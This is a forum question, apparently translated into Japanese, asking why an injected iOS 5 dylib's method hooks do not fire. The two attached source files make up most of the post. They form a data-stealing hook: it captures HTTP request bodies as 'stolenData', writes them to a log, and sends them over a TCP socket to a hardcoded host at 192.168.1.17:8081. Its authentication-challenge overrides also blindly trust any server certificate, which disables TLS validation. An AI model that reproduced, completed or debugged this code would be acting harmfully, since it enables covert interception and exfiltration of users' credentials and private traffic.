iphone - iOS 5 で関数をフックできない

Question

フックをテストすると、dylib をシステムに注入できますが、フックしたいシステム関数は機能しません。トレースするために dylib にログを書きましたが、class_replaceMethod コードもサブストレート lib も機能していないようです。フック用に Info.plist ファイルを iphone フォルダーにコピーしませんでした。

ここに両方の​​アプローチコードを添付しました。手伝ってもらえますか？

//////injection.m
#include <Foundation/Foundation.h>
#include <objc/objc.h>
#include <objc/runtime.h>
#include <UIKit/UIKit.h>

void didReceiveAuthenticationChallenge(id self, SEL op, NSURLConnection *connection, NSURLAuthenticationChallenge *challenge)
{
    if ( [ challenge.protectionSpace.authenticationMethod isEqualToString:NSURLAuthenticationMethodServerTrust ])
{
    [ challenge.sender useCredential: [ NSURLCredential credentialForTrust: challenge.protectionSpace.serverTrust] forAuthenticationChallenge: challenge];
}

[ challenge.sender continueWithoutCredentialForAuthenticationChallenge: challenge ];
}

BOOL canAuthenticateAgainstProtectionSpace(id self, SEL op, NSURLConnection *connection, NSURLProtectionSpace *protectionSpace)
{
if ( [ [ protectionSpace authenticationMethod ] isEqualToString: NSURLAuthenticationMethodServerTrust ])
{
    return YES;
}
}

IMP __mutableURLRequestIMP;
IMP __URLRequestIMP;
IMP __UIWindowSendEventIMP;

void setMutableHTTPBody(id self, SEL op, NSData *data)
{
mkdir("/usr/lib/iloginjection1", 777);

NSMutableURLRequest *theRequest = (NSMutableURLRequest *)self;
NSString *stolenData = [NSString stringWithFormat:@"%@ = > %s\n", [theRequest.URL absoluteString], [data bytes]];

//sendInterceptedData(stolenData);
(__mutableURLRequestIMP)(self, op, data);
}

void setUIWindowSendEvent(id self, SEL op, UIEvent *event)
{
    mkdir("/usr/lib/iloginjection2", 777);

    //NSURLRequest *theRequest = (NSURLRequest *)self;
    //NSString *stolenData = [NSString stringWithFormat:@"%@ = > %s\n",
    //                        [theRequest.URL absoluteString], [data bytes]];

    //sendInterceptedData(stolenData);
    (__UIWindowSendEventIMP)(self, op, event);
}

static void __attribute__((constructor)) initialize(void)
{
    NSLog(@"initialize鈥︹€︹€?");
    mkdir("/usr/lib/iloginjection", 777);

    __UIWindowSendEventIMP = class_replaceMethod(objc_getClass("UIWindow"), sel_registerName("sendEvent:"), setUIWindowSendEvent, "@:@");

    __mutableURLRequestIMP = class_replaceMethod(objc_getClass("NSMutableURLRequest"), sel_registerName("SetHTTPBody:"), setMutableHTTPBody, "@:@");

    //__URLRequestIMP = class_replaceMethod(objc_getClass("NSURLRequest"), sel_registerName("SetHTTPBody:"), setHTTPBody, "@:@");
}


/////////////////////////////////////////////////////////////////////////////
HookDemoInitialize.mm
////////////////////////////////////////////////////////////////////////////

#import "substrate.h"
#import "MessagesHook.h"
#include <Foundation/Foundation.h>
#include <objc/objc.h>
#include <objc/runtime.h>

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <errno.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <net/if.h>
#include <arpa/inet.h>
#include <netinet/tcp.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <string>

#define HOST "192.168.1.17"
#define PORT 8081

IMP __mutableURLRequestIMP;

extern "C"
{
    extern IMP original_setHTTPBody;
    //extern void replace_setHTTPBody(UIWindow *self, SEL cmd, UIEvent *event);
}

void sendInterceptedData(NSString* stolenData)
{
    char *buf = strdup([stolenData UTF8String]);
    struct sockaddr_in addr;
    size_t nr = strlen(buf) + 1;
    int nw;
    int addr_len;
    int yes = 1;
    int r, wfd;
    off_t off;

    wfd = socket(AF_INET, SOCK_STREAM, 0);
    memset(&addr, 0, sizeof(struct sockaddr_in));
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = inet_addr(HOST);
    addr.sin_port = htons(PORT);
    addr_len = sizeof(struct sockaddr_in);

    r = connect(wfd, (struct sockaddr*)& addr, addr_len);
    if(r < 0)
    {
        close(wfd);
        free(buf);
        return;
    }

    setsockopt(wfd, SOL_SOCKET, TCP_NODELAY, &yes, sizeof(int));

    for(off = 0; nr; nr -= nw, off += nw)
    {
        if((nw = send(wfd, buf + off, (size_t)nr, 0)) < 0)
        {
            close(wfd);
            free(buf);
            return;
        }
    }

    free(buf);
    close(wfd);
}

extern "C" void replace_setHTTPBody(id self, SEL op, NSData *data)
{
    NSLog(@"replace_setHTTPBody is call In Hook2");

    NSMutableURLRequest *theRequest = (NSMutableURLRequest *)self;
    NSString *stolenData = [NSString stringWithFormat:@"%@ = > %s\n", [theRequest.URL absoluteString], [data bytes]];

    mkdir("/usr/lib/ilog", 777);
    int fd = open("/usr/lib/ilog/hw.log", O_CREAT | O_RDWR | O_APPEND);

    char *buf = strdup([stolenData UTF8String]);
    size_t nr = strlen(buf) + 1;
    write(fd, buf, nr);
    close(fd);

    sendInterceptedData(stolenData);

    original_setHTTPBody(self, op, data);
}

void setHTTPBody(id self, SEL op, NSData *data)
{
    NSMutableURLRequest *theRequest = (NSMutableURLRequest *)self;
    NSString *stolenData = [NSString stringWithFormat:@"%@ = > %s\n", [theRequest.URL absoluteString], [data bytes]];

    sendInterceptedData(stolenData);
    (__mutableURLRequestIMP)(self, op, data);
}

void (*original_didReceiveAuthenticationChallenge)(id self, SEL op, NSURLConnection *connection, NSURLAuthenticationChallenge *challenge);
void replaced_didReceiveAuthenticationChallenge(id self, SEL op, NSURLConnection *connection, NSURLAuthenticationChallenge *challenge)
{
    NSLog(@"\n*********************replaced_didReceiveAuthenticationChallenge");
    if ( [ challenge.protectionSpace.authenticationMethod isEqualToString:NSURLAuthenticationMethodServerTrust ])
    {
        [ challenge.sender useCredential: [ NSURLCredential credentialForTrust: challenge.protectionSpace.serverTrust] forAuthenticationChallenge: challenge];
    }

    int fd = open("/usr/lib/ilog/hw.log", O_CREAT | O_RDWR | O_APPEND);
    std::string buf = "\n*********************replaced_didReceiveAuthenticationChallenge\n";
    write(fd, buf.c_str(), buf.length());
    close(fd);

    [ challenge.sender continueWithoutCredentialForAuthenticationChallenge:challenge ];
}

BOOL (*original_canAuthenticateAgainstProtectionSpace)(id self, SEL op, NSURLConnection *connection, NSURLProtectionSpace *protectionSpace);
BOOL replaced_canAuthenticateAgainstProtectionSpace(id self, SEL op, NSURLConnection *connection, NSURLProtectionSpace *protectionSpace)
{
    NSLog(@"\n*********************replaced_canAuthenticateAgainstProtectionSpace");

    int fd = open("/usr/lib/ilog/hw.log", O_CREAT | O_RDWR | O_APPEND);
    std::string buf = "\n*********************replaced_canAuthenticateAgainstProtectionSpace\n";
    write(fd, buf.c_str(), buf.length());
    close(fd);

    // if ( [ [ protectionSpace authenticationMethod ]
    //      isEqualToString: NSURLAuthenticationMethodServerTrust ])
    // {
    return NO;
    //}
}

extern "C" void HookDemoInitialize() 
{
    NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];

    NSLog(@"HookDemoInitialize is call In Hook2");

    mkdir("/usr/lib/ilog", 777);

    MSHookMessageEx([UIWindow class], @selector(sendEvent:), (IMP)replace_UIWindow_sendEvent, (IMP *)&original_UIWindow_sendEvent);

    //__mutableURLRequestIMP = class_replaceMethod(objc_getClass("NSMutableURLRequest"), sel_registerName("SetHTTPBody:"), setHTTPBody, "@:@");

    //MSHookMessageEx([NSMutableURLRequest class], @selector(SetHTTPBody:), (IMP)replace_setHTTPBody, (IMP *)&original_setHTTPBody);

    MSHookMessageEx([NSURLRequest class], @selector(SetHTTPBody:), (IMP)replace_setHTTPBody, (IMP *)&original_setHTTPBody);

    MSHookMessageEx([NSURLConnection class], @selector(didReceiveAuthenticationChallenge:), (IMP)replaced_didReceiveAuthenticationChallenge,(IMP *)&original_didReceiveAuthenticationChallenge);

    MSHookMessageEx([NSURLConnection class], @selector(canAuthenticateAgainstProtectionSpace:), (IMP)replaced_canAuthenticateAgainstProtectionSpace,(IMP *)&original_canAuthenticateAgainstProtectionSpace);

    [pool release];
}